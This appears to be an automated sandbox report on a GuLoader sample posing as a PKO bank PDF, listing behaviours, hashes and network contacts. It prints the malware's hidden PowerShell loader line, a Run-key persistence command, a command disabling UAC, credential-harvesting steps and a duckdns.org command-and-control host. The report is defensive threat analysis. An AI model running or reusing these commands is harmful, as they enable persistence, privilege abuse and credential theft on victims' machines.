Analysis Overview
SHA256
d7325eb4553b2c58a8580cb84af63cfe5cdf4ff23a3d4e09a963c656d5717d8c
Threat Level: Known bad
The file pko_trans_details_20240710_105339·pdf.exe was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
UAC bypass
NirSoft MailPassView
Nirsoft
NirSoft WebBrowserPassView
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Loads dropped DLL
Accesses Microsoft Outlook accounts
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Program crash
Enumerates physical storage devices
Unsigned PE
NSIS installer
Modifies registry key
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-10 08:39
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-10 08:39
Reported
2024-07-10 08:42
Platform
win7-20240704-en
Max time kernel
14s
Max time network
19s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1144 wrote to memory of 760 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1144 wrote to memory of 760 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1144 wrote to memory of 760 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1144 wrote to memory of 760 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1144 wrote to memory of 760 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1144 wrote to memory of 760 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1144 wrote to memory of 760 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-07-10 08:39
Reported
2024-07-10 08:42
Platform
win10v2004-20240709-en
Max time kernel
93s
Max time network
123s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4924 wrote to memory of 3416 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4924 wrote to memory of 3416 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4924 wrote to memory of 3416 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3416 -ip 3416
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 644
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-10 08:39
Reported
2024-07-10 08:42
Platform
win7-20240704-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Guloader,Cloudeye
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Preeffort = "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\\Jeglasset\\').Communicatory;%Begittede% ($Assiduity)" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2284 set thread context of 1776 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2284 set thread context of 2336 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2284 set thread context of 2216 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe
"C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Forhrt=Get-Content 'C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San';$Forset=$Forhrt.SubString(45874,3);.$Forset($Forhrt)"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\spihmgmddbbjigpockgw"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\djnamyferjtolmmslutqajl"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\fltsnrpyfrlbvbawufgrkogwrg"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | a458386d9.duckdns.org | udp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
Files
\Users\Admin\AppData\Local\Temp\nso47AB.tmp\nsDialogs.dll
| MD5 | 1c8b2b40c642e8b5a5b3ff102796fb37 |
| SHA1 | 3245f55afac50f775eb53fd6d14abb7fe523393d |
| SHA256 | 8780095aa2f49725388cddf00d79a74e85c9c4863b366f55c39c606a5fb8440c |
| SHA512 | 4ff2dc83f640933162ec8818bb1bf3b3be1183264750946a3d949d2e7068ee606277b6c840193ef2b4663952387f07f6ab12c84c4a11cae9a8de7bd4e7971c57 |
\Users\Admin\AppData\Local\Temp\nso47AB.tmp\BgImage.dll
| MD5 | 521df745a41f0b8164ffd01717cacbba |
| SHA1 | dc7a9eacfbeb1fae52091da5e80db6cb1b6bce74 |
| SHA256 | dbf91707fa157603bea025a6411cdcb497ab11262c9c18b14dc431a45aa17c0b |
| SHA512 | c5b1ba062872a8f534e2f0eac57fc3c0d8be9cda79605d86566d67260ba5477444a0ddfed1838b4fb14c677e5342c8419a88fcd38147dbaa36ac1f9e00c52bbe |
\Users\Admin\AppData\Local\Temp\nso47AB.tmp\UserInfo.dll
| MD5 | acbda33dd5700c122e2fe48e3d4351fd |
| SHA1 | 2c154baf7c64052ee712b7cdf9c36b7697dd3fc8 |
| SHA256 | 943b33829f9013e4d361482a5c8981ba20a7155c78691dbe02a8f8cd2a02efa0 |
| SHA512 | d090adf65a74ac5b910b18bb67e989714335e7b4778cd771cff154d7186351a1bebbc7103cca849bdfa2709c991947ffff6c1d8fdf16a74f4dfb614bce3ff6fd |
memory/2284-30-0x00000000737B1000-0x00000000737B2000-memory.dmp
memory/2284-32-0x00000000737B0000-0x0000000073D5B000-memory.dmp
memory/2284-33-0x00000000737B0000-0x0000000073D5B000-memory.dmp
memory/2284-31-0x00000000737B0000-0x0000000073D5B000-memory.dmp
memory/2284-34-0x00000000737B0000-0x0000000073D5B000-memory.dmp
C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San
| MD5 | bf1ebfd1285dd7ef43a587e9f51a8e33 |
| SHA1 | 1dede4026611e9f40c91d9bbe406a06b2fd8bfa4 |
| SHA256 | de1db1c0a065f580b4fe878c5b363933e45ec7f0c06118d29b6d167af24189ff |
| SHA512 | 3b7b11a8989a0b46e4091c8e4c81e71a2454fc9fba77618d844653d548ecd59a2c8b8fce3338fa499ca84da8664f7e34f355ab8b18e3507598f5f63dd3a80389 |
memory/2284-37-0x00000000737B0000-0x0000000073D5B000-memory.dmp
memory/2284-38-0x00000000737B0000-0x0000000073D5B000-memory.dmp
C:\Users\Admin\AppData\Local\kilns\Unobtainably\Polemoniaceae11.Non
| MD5 | afc1982fff88592a55312010cfc773c6 |
| SHA1 | c57e918c5149ca9c2a331a78ecef84ffc667feb7 |
| SHA256 | 02a71af4b95cf275ba0430022e9c2665bd1e4ddb3177202c1c3059901eefd4f0 |
| SHA512 | f4acf46244cb0115e0666a631af6dd2e7400478103cd9c152e48307a2239108e7e6bf3b39467747b3efa8b0fbdc59216ad6a26ec5587c19bb56fb4512233117e |
memory/2284-40-0x00000000737B0000-0x0000000073D5B000-memory.dmp
memory/2284-41-0x00000000737B0000-0x0000000073D5B000-memory.dmp
memory/2284-43-0x00000000062B0000-0x000000000AE6C000-memory.dmp
memory/2284-65-0x00000000062B0000-0x000000000AE6C000-memory.dmp
memory/1776-73-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2336-75-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2336-76-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2216-80-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2216-83-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1776-82-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2336-81-0x0000000000400000-0x0000000000462000-memory.dmp
memory/1776-78-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2336-77-0x0000000000400000-0x0000000000462000-memory.dmp
memory/1776-74-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2216-84-0x0000000000400000-0x0000000000424000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\spihmgmddbbjigpockgw
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\ProgramData\remcos\logs.dat
| MD5 | e607cf77e798eb275450c3cda5efeb1c |
| SHA1 | 0b3602942f3d9ad7e1f1ef979ebe589dbc8a8862 |
| SHA256 | 9751f67592c212d9ec4b500087a13140f1feb12af149c0ccbbed240328d71011 |
| SHA512 | 59e4cb59341bca7c436eac0e6e471e52dea263d829fc9c498cd9eabdc6808b6f15931b8a6068e32cfc170ea39ddf4f3bdb300ef937f5aedbb419ea5ee77dd411 |
memory/2284-91-0x0000000010000000-0x0000000010019000-memory.dmp
memory/2284-95-0x0000000010000000-0x0000000010019000-memory.dmp
memory/2284-94-0x0000000010000000-0x0000000010019000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-10 08:39
Reported
2024-07-10 08:42
Platform
win10v2004-20240709-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Guloader,Cloudeye
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Preeffort = "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\\Jeglasset\\').Communicatory;%Begittede% ($Assiduity)" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3220 set thread context of 2468 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3220 set thread context of 1760 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3220 set thread context of 3700 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe
"C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Forhrt=Get-Content 'C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San';$Forset=$Forhrt.SubString(45874,3);.$Forset($Forhrt)"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\dtgxucotnzmfifzebwqmlwxcdtnqyepc"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\nnmp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\yqrivmj"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 85.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a458386d9.duckdns.org | udp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
| US | 8.8.8.8:53 | 73.50.76.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.80.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nsqC871.tmp\nsDialogs.dll
| MD5 | 1c8b2b40c642e8b5a5b3ff102796fb37 |
| SHA1 | 3245f55afac50f775eb53fd6d14abb7fe523393d |
| SHA256 | 8780095aa2f49725388cddf00d79a74e85c9c4863b366f55c39c606a5fb8440c |
| SHA512 | 4ff2dc83f640933162ec8818bb1bf3b3be1183264750946a3d949d2e7068ee606277b6c840193ef2b4663952387f07f6ab12c84c4a11cae9a8de7bd4e7971c57 |
C:\Users\Admin\AppData\Local\Temp\nsqC871.tmp\BgImage.dll
| MD5 | 521df745a41f0b8164ffd01717cacbba |
| SHA1 | dc7a9eacfbeb1fae52091da5e80db6cb1b6bce74 |
| SHA256 | dbf91707fa157603bea025a6411cdcb497ab11262c9c18b14dc431a45aa17c0b |
